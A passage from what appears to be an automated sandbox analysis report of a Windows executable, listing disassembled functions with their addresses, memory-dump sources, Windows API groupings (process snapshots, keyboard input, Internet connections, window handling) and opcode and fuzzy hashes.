                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 4141327611-0
                                                                                          • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                          • Instruction ID: d327283470226386a84ce97179b7eba57c7eed55d11296d3d76d8b37f639ad38
                                                                                          • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                          • Instruction Fuzzy Hash: 83418432B0C782C6FB61BB919154379EA90EF84B90FA44131DAC947AE5FF3CE8418725
                                                                                          Function 00007FF74D0ABE00 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 1083639309-0
                                                                                          • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                          • Instruction ID: 6ad3df55358150f097150c6ca7be24303feb96a033e39c13dc662a52a05ba939
                                                                                          • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                          • Instruction Fuzzy Hash: A2415122A1CA82D6E710FB62E4545AEA3A4FB94B84F944036EE8D07765EF7CE505C720
                                                                                          Function 00007FF74D0A8B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                          • String ID:
                                                                                          • API String ID: 432972143-0
                                                                                          • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                          • Instruction ID: 7eb8374c627dda871c59dd1900fada17c1fbab7b919e4aaa2d95f9c3e594c668
                                                                                          • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                          • Instruction Fuzzy Hash: 254118A1A1D682C1F730BB2194147B9A6A0FB64B90F950532EADA137F5EE3CD485CB70
                                                                                          Function 00007FF74D0DC580 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongWindow$InvalidateMessageRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 3340791633-0
                                                                                          • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                          • Instruction ID: d1c092372001f0036679480f54746def306b4ec65e6bfbe7cf8ff9255c7c5d69
                                                                                          • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                          • Instruction Fuzzy Hash: 8B419231E0C546C5FB64BB14D4243B8E760EB88B94F985137DAAD436F1EE7CE8818728
                                                                                          Function 00007FF74D0A8CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                          • String ID:
                                                                                          • API String ID: 432972143-0
                                                                                          • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                          • Instruction ID: 57df0ff52c337ed57f42d016e29a346b0f762015ae4e1501fee429c435ae9c45
                                                                                          • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                          • Instruction Fuzzy Hash: 8B31F521E0C681C6E730BB2194047B9ABA0FB78B50F950235DAD9037A5EE3CD951C730
                                                                                          Function 00007FF74D0BD7DC Relevance: 6.1, APIs: 4, Instructions: 82networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1463438336-0
                                                                                          • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                          • Instruction ID: 4454b826c1173f5be9cd1878754adf8b8421e43a2efffd9d985ef027687684d9
                                                                                          • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                          • Instruction Fuzzy Hash: 10319032A0CB46C2E724FB56E054779E361FB49B94F484136DA8E07B68EF2CE0548B60
                                                                                          Function 00007FF74D073D98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF74D06A27B,?,?,?,00007FF74D06A236), ref: 00007FF74D073DB1
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF74D06A27B,?,?,?,00007FF74D06A236), ref: 00007FF74D073E13
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF74D06A27B,?,?,?,00007FF74D06A236), ref: 00007FF74D073E4D
                                                                                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF74D06A27B,?,?,?,00007FF74D06A236), ref: 00007FF74D073E77
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                          • String ID:
                                                                                          • API String ID: 1557788787-0
                                                                                          • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                          • Instruction ID: cb0567a78346d3430e9d7190725b4ffa3b7c516559f39ff8214f2c0811f3ddbb
                                                                                          • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                          • Instruction Fuzzy Hash: 19217C21F1C791C1EA20BF12A444039F6A5AB98FD0F884534DAEE27BE4EF3CE4528310
                                                                                          Function 00007FF74D0DF8A8 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID:
                                                                                          • API String ID: 847901565-0
                                                                                          • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                          • Instruction ID: 6075b8b28fb879a4c14d07318b427741b45a7320de85633e046fce73b649662f
                                                                                          • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                          • Instruction Fuzzy Hash: D221D321E0CB86C5EA14BB25A894339B651AF85BA0F954336EDAD07BE4EF7CE441C710
                                                                                          Function 00007FF74D0E108C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2864067406-0
                                                                                          • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                          • Instruction ID: 16bbf9e68f35d8ab9f60b61e2f622b90a8f5ce63ef79b3bf5b60e60af5caf4fb
                                                                                          • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                          • Instruction Fuzzy Hash: 09314425A0CA49C5E710FB15E4543B9A7A0FB88F94F944232DA8D43BB4EF7CD545C710
                                                                                          Function 00007FF74D0A50E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                          • String ID: cdecl
                                                                                          • API String ID: 4031866154-3896280584
                                                                                          • Opcode ID: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                                                          • Instruction ID: 8916a069ae12b1877a5e6ae48341e691c65f8e1a5a2eaf10d78d494ed2dfd8bc
                                                                                          • Opcode Fuzzy Hash: 9543eb87236cbe86fa524af2d72e3452b2187adb33a089d16778c3ede46c2dfa
                                                                                          • Instruction Fuzzy Hash: 5321AD2160C742C5EA10BF16A858278B3A1FF98FD0B894234EB9E477A1EF7CE450C324
                                                                                          Function 00007FF74D09D6A0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                          • String ID:
                                                                                          • API String ID: 837644225-0
                                                                                          • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                          • Instruction ID: 7ad11d243a6ff134cf4b4960a1e99f815e6c4375e66119e70602eb43f13b8ed9
                                                                                          • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                          • Instruction Fuzzy Hash: 9721A072A1CA41C6EB04EF21D408768E3A6FB89B95F854539DA9D03764EF3CD942C720
                                                                                          Function 00007FF74D0E2264 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF74D032A54: GetWindowLongPtrW.USER32 ref: 00007FF74D032A71
                                                                                          • GetClientRect.USER32(?,?,?,?,?,00007FF74D07AA36,?,?,?,?,?,?,?,?,?,00007FF74D0327AF), ref: 00007FF74D0E22C4
                                                                                          • GetCursorPos.USER32(?,?,?,?,?,00007FF74D07AA36,?,?,?,?,?,?,?,?,?,00007FF74D0327AF), ref: 00007FF74D0E22CF
                                                                                          • ScreenToClient.USER32 ref: 00007FF74D0E22DD
                                                                                          • DefDlgProcW.USER32(?,?,?,?,?,00007FF74D07AA36,?,?,?,?,?,?,?,?,?,00007FF74D0327AF), ref: 00007FF74D0E231F
                                                                                            • Part of subcall function 00007FF74D0DE894: LoadCursorW.USER32 ref: 00007FF74D0DE945
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1626762757-0
                                                                                          • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                          • Instruction ID: 5257abc7ddb8f0df6e5de604aba2c8156b55acf9ffa0566c8cfc610bfe0e424f
                                                                                          • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                          • Instruction Fuzzy Hash: E7213E22A0C64AC6EA24FB15F494569B361FB88F84F940531EBCD47B65EF3CE941CB10
                                                                                          Function 00007FF74D03932C Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3970641297-0
                                                                                          • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                          • Instruction ID: b5b3a954b2d3386c316a9c307ae0cf158dc2a001aacbd4efae11ae4b3fe1ac24
                                                                                          • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                          • Instruction Fuzzy Hash: 39211B72A0D7C5CAE764EB15E4487AAB7A0FB89780F840135DA8D43B64EB7CD4948B00
                                                                                          Function 00007FF74D0ACF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 2979156933-0
                                                                                          • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                          • Instruction ID: 097b0fe4170198256d1b67e548677741378f8bafd79084c0f61e70f045fcf08f
                                                                                          • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                          • Instruction Fuzzy Hash: 6A219532B0C686C6E710AB16B84426AF691BB88BD4F858235E9D943765EF7CD1058760
                                                                                          Function 00007FF74D062FB8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ctrlfp
                                                                                          • String ID:
                                                                                          • API String ID: 697997973-0
                                                                                          • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                          • Instruction ID: 02158e14841a680d9439bfa169ab13abd0d4629803c9841b9f0dc7efe956e2b2
                                                                                          • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                          • Instruction Fuzzy Hash: 1411F621E0C542C2E611BA78915107FE671EF9B790FA84231FBC94BAB9EE2DE4418A40
                                                                                          Function 00007FF74D0DFA78 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 357397906-0
                                                                                          • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                          • Instruction ID: e89f3af091b5acf7a8074d2c17d2491723eba7e514810e8c4644625265c8a57e
                                                                                          • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                          • Instruction Fuzzy Hash: 6A21C7B6E08B45DEEB00EF74D85869C77B1F748B48B404C26EB5893B28EB78D654CB50
                                                                                          Function 00007FF74D0A4B28 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
